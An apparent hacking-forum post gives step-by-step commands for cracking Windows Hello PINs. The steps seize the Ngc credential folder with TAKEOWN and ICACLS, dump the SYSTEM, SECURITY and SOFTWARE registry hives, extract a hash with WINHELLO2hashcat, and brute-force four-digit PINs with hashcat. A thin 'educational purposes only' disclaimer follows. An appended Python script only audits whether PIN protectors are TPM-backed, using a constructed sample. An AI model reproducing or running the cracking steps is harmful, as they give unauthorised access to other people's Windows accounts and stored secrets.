#1
I recently had a chance to try out an excellent way of cracking the PIN on Windows PCs. The needed files are protected, of course, but there are two ways to do it. The first (and easiest) method is to boot the PC using a Linux live USB or connect the unencrypted system drive to another computer. Or you can run the script from another administrator account on the running machine. You will need to run the first set of commands to get access to the NGC folder and registry hives. The instructions on the GitHub README do not work. Also, make sure to install Python and the dpapick3 module first.
 
Code:
Administrator Command Prompt:
TAKEOWN /f %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /r /D Y
ICACLS %windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc /grant "%username%":(F) /t
reg save hklm\system SYSTEM
reg save hklm\security SECURITY
reg save hklm\software SOFTWARE
python WINHELLO2hashcat.py --cryptokeys "%windir%\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys" --masterkey "%windir%\System32\Microsoft\Protect\S-1-5-18\User" --system SYSTEM --security SECURITY --software SOFTWARE --ngc "%windir%\ServiceProfiles\LocalService\AppData\Local\Microsoft\Ngc" > hash.txt

On Linux:
Code:
sudo mkdir /mnt/windows
sudo mount /dev/<windows system partition> /mnt/windows
git clone https://github.com/Banaanhangwagen/WINHELLO2hashcat.git
cd WINHELLO2hashcat
sudo python3 WINHELLO2hashcat.py --windows /mnt/windows/Windows > hash.txt

Now run 'hashcat -m 28100 -a 3 hash.txt ?d?d?d?d'. The PIN number should be output in a second or so.

As a final note, it's important to check the 2.dat file in the NGC\GUID\Protectors\1 folder for the PIN_GUID and the 1.dat file in that folder to verify that "MS Platform Provider" is not present. Otherwise, a TPM is used to store secrets (likely the case for 2018 models and later).



Finally, this guide is for educational purposes only, to be used on your local environment or authorized use. Good luck, you all.

 
Clicking the like button will motivate me to post more threads ❤️
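
The 1.dat provider check from the final note, written as a fleet-audit script that flags Windows Hello containers whose PIN protector is software-backed rather than TPM-backed. This is an added example, not part of the original post or the WINHELLO2hashcat project. It assumes 1.dat holds the standard CNG provider name ("Microsoft Platform Crypto Provider" for a TPM, "Microsoft Software Key Storage Provider" otherwise) encoded as UTF-16LE, and it generalizes the check to every folder under Protectors rather than only `1`; the sample tree is constructed.

```python
import sys
import tempfile
from pathlib import Path

# Standard CNG key storage provider names; 1.dat is assumed to hold one of them.
TPM_PROVIDER = "Microsoft Platform Crypto Provider"
SOFTWARE_PROVIDER = "Microsoft Software Key Storage Provider"


def classify_protector(data: bytes) -> str:
    """Return 'tpm', 'software' or 'unknown' for the bytes of a 1.dat file."""
    for label, name in (("tpm", TPM_PROVIDER), ("software", SOFTWARE_PROVIDER)):
        # Assumption: the name is stored as UTF-16LE; ASCII is a fallback.
        if name.encode("utf-16-le") in data or name.encode("ascii") in data:
            return label
    return "unknown"


def audit_ngc(ngc_root) -> dict:
    """Map '<container GUID>/<protector>' to the provider class of its 1.dat."""
    results = {}
    for dat in sorted(Path(ngc_root).glob("*/Protectors/*/1.dat")):
        key = f"{dat.parts[-4]}/{dat.parts[-2]}"
        try:
            results[key] = classify_protector(dat.read_bytes())
        except OSError:
            results[key] = "unreadable"  # Ngc folder ACLs block normal users
    return results


def build_sample(root) -> Path:
    """Constructed sample tree (not real data): one software, one TPM container."""
    ngc = Path(root) / "Ngc"
    for guid, name in (("{AAAA-CONSTRUCTED}", SOFTWARE_PROVIDER),
                       ("{BBBB-CONSTRUCTED}", TPM_PROVIDER)):
        folder = ngc / guid / "Protectors" / "1"
        folder.mkdir(parents=True)
        (folder / "1.dat").write_bytes(name.encode("utf-16-le") + b"\x00\x00")
    return ngc


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        # Pass the path to an Ngc folder, or run with no argument for the sample.
        root = sys.argv[1] if len(sys.argv) > 1 else build_sample(tmp)
        for container, kind in audit_ngc(root).items():
            print(f"{kind:10} {container}")
```

A `software` result means the PIN's secrets live on disk and depend on full-disk encryption and physical access control for protection; a `tpm` result means they are bound to the machine's TPM.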